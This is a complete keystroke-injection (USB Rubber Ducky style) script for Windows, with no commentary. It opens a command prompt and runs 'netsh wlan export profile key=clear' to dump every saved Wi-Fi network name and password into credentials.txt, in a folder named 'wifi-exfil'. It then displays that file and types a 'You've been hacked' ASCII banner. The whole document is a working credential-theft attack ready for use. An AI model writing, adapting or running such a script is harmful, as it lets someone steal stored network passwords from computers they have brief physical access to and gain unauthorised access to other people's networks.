DELAY 200
GUI r
DELAY 450
STRING cmd
ENTER
DELAY 200
STRING mkdir wifi-exfil
ENTER
DELAY 200
STRING cd wifi-exfil
ENTER
DELAY 200
STRING netsh wlan export profile folder=. key=clear
ENTER
DELAY 200
STRING findstr /c:"<name>" /c:"<keyMaterial>" WLAN*.xml > credentials.txt
ENTER
DELAY 200
STRING notepad credentials.txt
ENTER
DELAY 200
ENTER
ENTER
DELAY 200
STRING You've been hacked
ENTER
STRING __       __  __         ______   __    __        __    __                                 ______                      
ENTER
STRING |  \  _  |  \|  \       /      \ |  \  |  \      |  \  |  \                               /      \                     
ENTER
STRING | $$ / \ | $$| $$      |  $$$$$$\| $$\ | $$      | $$  | $$  ______   __    __  __    __ |  $$$$$$\  ______    _______ 
ENTER
STRING | $$/  $\| $$| $$      | $$__| $$| $$$\| $$      | $$__| $$ |      \ |  \  /  \|  \  /  \| $$$\| $$ /      \  /       \
ENTER
STRING | $$  $$$\ $$| $$      | $$    $$| $$$$\ $$      | $$    $$  \$$$$$$\ \$$\/  $$ \$$\/  $$| $$$$\ $$|  $$$$$$\|  $$$$$$$
ENTER
STRING | $$ $$\$$\$$| $$      | $$$$$$$$| $$\$$ $$      | $$$$$$$$ /      $$  >$$  $$   >$$  $$ | $$\$$\$$| $$   \$$ \$$    \ 
ENTER
STRING | $$$$  \$$$$| $$_____ | $$  | $$| $$ \$$$$      | $$  | $$|  $$$$$$$ /  $$$$\  /  $$$$\ | $$_\$$$$| $$       _\$$$$$$\
ENTER
STRING | $$$    \$$$| $$     \| $$  | $$| $$  \$$$      | $$  | $$ \$$    $$|  $$ \$$\|  $$ \$$\ \$$  \$$$| $$      |       $$
ENTER
STRING \$$      \$$ \$$$$$$$$ \$$   \$$ \$$   \$$       \$$   \$$  \$$$$$$$ \$$   \$$ \$$   \$$  \$$$$$$  \$$       \$$$$$$$
ENTER
